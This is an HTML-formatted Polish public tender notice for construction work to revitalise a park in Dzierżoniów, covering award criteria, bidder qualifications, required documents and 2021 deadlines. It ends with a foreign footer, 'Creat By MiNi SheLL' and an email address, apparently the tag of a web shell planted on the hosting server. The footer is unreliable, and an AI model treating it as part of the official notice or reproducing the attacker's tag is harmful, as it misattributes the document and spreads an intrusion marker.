Cywilnym. Strony rozszerzają odpowiedzialność z tytułu rękojmi na okres gwarancji zadeklarowany przez Wykonawcę w ofercie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45223200-8 - Roboty konstrukcyjne</p> <p class="mb-0">45233161-5 - Roboty budowlane w zakresie ścieżek pieszych</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">300 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni<br/>wszystkie postawione w SWZ warunki, nie podlega wykluczeniu z postępowania, złoży ofertę<br/>niepodlegającą odrzuceniu oraz uzyska łącznie największą liczbę punktów stanowiących sumę<br/>punktów przyznanych w ramach każdego z podanych kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres obowiązywania gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika budowy w specjalności konstrukcyjno-budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określa następujące warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>a) w zakresie doświadczenia:<br/>Warunek zostanie spełniony, jeżeli Wykonawca samodzielnie lub Wykonawcy występujący wspólnie lub przy udziale innego podmiotu, na którego zdolnościach technicznych lub zawodowych polega Wykonawca wykaże (doświadczenie ww. podmiotów nie sumuje się), że nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie roboty budowlane polegające na budowie lub/i przebudowie chodników lub/i parkingów lub/i dróg z kostki kamiennej, granitowej lub betonowej, o pow. 500m2 każda i załączy dowody określające, że roboty te zostały wykonane należycie.<br/>b) w zakresie kwalifikacji zawodowych:<br/>Warunek zostanie spełniony, jeżeli Wykonawca samodzielnie lub Wykonawcy występujący wspólnie, lub przy udziale podmiotu, na którego zdolnościach technicznych lub zawodowych polega Wykonawca wykaże, że dysponuje co najmniej jednym:<br/>a) kierownikiem budowy posiadającym uprawnienia budowlane w specjalności konstrukcyjno-budowlanej,<br/>b) kierownikiem robót w branży elektrycznej i elektroenergetycznej posiadającym uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,<br/>c) kierownikiem robót sanitarnych posiadającym uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych.<br/>Potencjał techniczny można łączyć w ramach jednej osoby.<br/>Za uprawnienia budowlane odpowiadające wyżej określonym uznane zostaną uprawnienia, które wydane zostały na podstawie wcześniej obowiązujących przepisów prawnych oraz odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu – EFTA (strony umowy o Europejskim Obszarze Gospodarczym) z zastrzeżeniem, art. 12 a oraz innych przepisów ustawy Prawo Budowlane (t.j. Dz. U. z 2020 r., poz. 1333 z późn. zm.) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2020 r., poz. 220 z późn. zm.).<br/>Uwaga! W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>• warunek określony pod literą a) musi być spełniony w całości przez co najmniej jednego<br/>z Wykonawców wspólnie ubiegających się o zamówienie (jeden lub każdy z podmiotów musi<br/>posiadać samodzielnie wymagane doświadczenie),<br/>• warunek określony pod literą b) zostanie spełniony jeżeli co najmniej jeden z Wykonawców<br/>wspólnie ubiegających się o zamówienie potwierdzi, iż spełnia ww. warunek albo Wykonawcy<br/>łącznie wykażą dysponowanie osobami.<br/>W odniesieniu do wyżej wymienionych warunków Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane, do realizacji których te zdolności są wymagane.<br/>Wykonawcy wspólnie ubiegający się o zamówienie dołączają do oferty oświadczenie, o którym mowa w art. 117 ust. 4 Ustawy (wzór stanowi załącznik nr 7 do SWZ), w którym wskażą które roboty budowlane zostaną wykonane przez poszczególnych wykonawców w odniesieniu do spełnienia ww. warunku.<br/>W przypadku, gdy wykonawca polega na zdolnościach innego podmiotu w zakresie doświadczania, warunek określony pod literą a) powyżej musi być spełniony w całości przez<br/>podmiot udostępniający zasób.<br/>W przypadku, gdy wykonawca polega na zdolnościach innego podmiotu, podmiot udostępniający zasób zobowiązany będzie zrealizować roboty budowlane, których wskazane<br/>zdolności dotyczą (podwykonawstwo). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy brak podstaw do wykluczenia z postępowania na podstawie przesłanek<br/>określonych w art. 108 ust. 1 ustawy Pzp (wzór stanowi załącznik nr 2 do SWZ). Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed<br/>wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do<br/>złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnego na dzień złożenia, następującego<br/>podmiotowego środka dowodowego: Potwierdzenie aktualności informacji zawartych w oświadczeniu,<br/>o którym mowa w rozdziale II podrozdziale 9 pkt. 1 lit. b SWZ w zakresie podstaw wykluczenia z<br/>postępowania wskazanych przez Zamawiającego (wzór stanowi załącznik nr 8 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem<br/>najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych: a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat (licząc wstecz od dnia, w którym upływa termin składnia ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – załącznik nr 9 do SWZ.<br/>Jeżeli Wykonawca powołuje sią na doświadczenie w realizacji robót budowlanych, wykonanych wspólnie z innymi Wykonawcami w ramach konsorcjum, powyższy wykaz dotyczy robót budowlanych faktycznie przez niego wykonanych.<br/>b) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 10 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz Ofertowy stanowi załącznik nr 1 do SWZ. 2. Jeżeli Wykonawca chce uzyskać<br/>punkty w kryterium doświadczenie kierownika budowy w specjalności konstrukcyjno-budowlanej wyznaczonego<br/>do realizacji zamówienia (KK), to musi wypełnić i załączyć do oferty wykaz doświadczenia do<br/>oceny w kryterium stanowiący załącznik nr 1A do SWZ. 3. Aktualne na dzień złożenia<br/>oświadczenia o niepodleganiu wykluczeniu (stanowi załącznik nr 2 do SWZ) oraz spełnianiu<br/>warunków udziału w postępowaniu (stanowi załącznik nr 3 do SWZ) w zakresie wskazanym w<br/>rozdziale II podrozdziałach 7 i 8 SWZ –- każdy osobno spośród Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (dotyczy również wspólników spółki cywilnej) i<br/>podmiot trzeci, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia<br/>warunków udziału w postępowaniu. Oferta oraz oświadczenie o niepodleganiu wykluczeniu oraz<br/>spełnianiu warunków udziału w postępowaniu muszą być złożone w oryginale. To samo dotyczy<br/>oświadczenia Wykonawcy o tym, że zachodzą wobec niego podstawy wykluczenia z<br/>postępowania na podstawie art. 108 ust. 1 pkt. 1, 2 ,5 ustawy Pzp (załącznik nr 4 – o ile dotyczy).<br/>4. Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych,<br/>Wykonawca, który składa ofertę za<br/>pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa<br/>obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania<br/>umowy. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>Wykonawcy zobowiązani są do ustanowienia pełnomocnika. Pełnomocnictwo do złożenia oferty<br/>musi być złożone w oryginale w takiej samej formie, jak składana jest oferta (tj. w formie<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym, lub podpisem osobistym). Dopuszcza się także złożenie<br/>elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w<br/>formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 par 2 ustawy z<br/>dnia14 lutego 1991 r. – Prawo o notariacie, które to poświadczenie notariusz opatruje<br/>kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa<br/>sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym<br/>lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być<br/>uwierzytelniona przez upełnomocnionego. 5. Oświadczenie Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia – załącznik nr 7 do SWZ. 6. Zobowiązanie podmiotu<br/>trzeciego – załącznik nr 6 do SWZ (o ile dotyczy). Zobowiązanie musi być złożone w formie<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby upoważnionej do<br/>reprezentowania Wykonawców zgodnie z formą reprezentacji określoną w dokumencie<br/>rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. 7. W przypadku gdy<br/>Wykonawca powierza wykonanie części zamówienia podwykonawcy, zobowiązany jest do<br/>wykazania w załączniku nr 5 do SWZ informacji o części zamówienia, której wykonanie<br/>zamierza powierzyć podwykonawcom oraz podania nazw ich firm, o ile są już znane.<br/>8. Zastrzeżenie tajemnicy przedsiębiorstwa – W przypadku informacji objętych tajemnicą<br/>przedsiębiorstwa Wykonawca powinien w momencie ich przekazania wyraźnie oznaczyć, które<br/>informacje stanowią tajemnicę przedsiębiorstwa oraz nie powinny być udostępniane. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> a) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego; b) Wszelka korespondencja<br/>będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem; c) Do oferty należy<br/>załączyć<br/>pełnomocnictwo dla ustanowionego pełnomocnika; d) Wykonawcy składają jedną ofertę, do<br/>której załączone będą dokumenty, o których mowa w SWZ; e) Wykonawca winien przedłożyć<br/>dokumenty i oświadczenia wymienione w rozdziale II podrozdziale 9 SWZ dotyczące każdego<br/>partnera konsorcjum osobno w zakresie tam wskazanym ; f) Oświadczenia i dokumenty<br/>wspólne, takie jak np.: oferta cenowa, składa pełnomocnik Wykonawców w imieniu wszystkich;<br/>g) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie; h) wszyscy partnerzy będą ponosić odpowiedzialność<br/>solidarną za wykonanie umowy zgodnie z jej postanowieniami; i) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców,<br/>którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. Wtedy<br/>powinni dołączyć do oferty oświadczenie (załącznik nr 7 do SWZ), z którego wynika, które roboty<br/>budowlane wykonują poszczególni Wykonawcy, j) przed podpisaniem umowy Wykonawcy<br/>składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę<br/>konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość zmiany umowy zawartej z wykonawcą. Wszystkie<br/>dopuszczalne zmiany postanowień umowy oraz określenie rodzaju,zakresu i warunków zmian<br/>zawarte są w SWZ oraz w § 19 wzoru umowy (stanowiącym załącznik nr 12 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem Platformy Zakupowej: https://dzierzoniow.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-17 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz<br/>poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy<br/>Pzp, przysługują środki ochrony prawnej określone w dziale IX ustawy Pzp. Pełna nazwa<br/>zamówienia: Wykonanie robót budowlanych polegających na rewitalizacji parku przy skrzyżowaniu ulic Daszyńskiego i Piłsudskiego na działce nr 159/14 obręb Centrum w ramach zadania pn.: „Rewitalizacja parku Miłośników Dzierżoniowa”. Przedmiot zamówienia będzie realizowany w ramach dofinansowania ze środków Rządowego Funduszu Inwestycji Lokalnych.

Creat By MiNi SheLL
Email: jattceo@gmail.com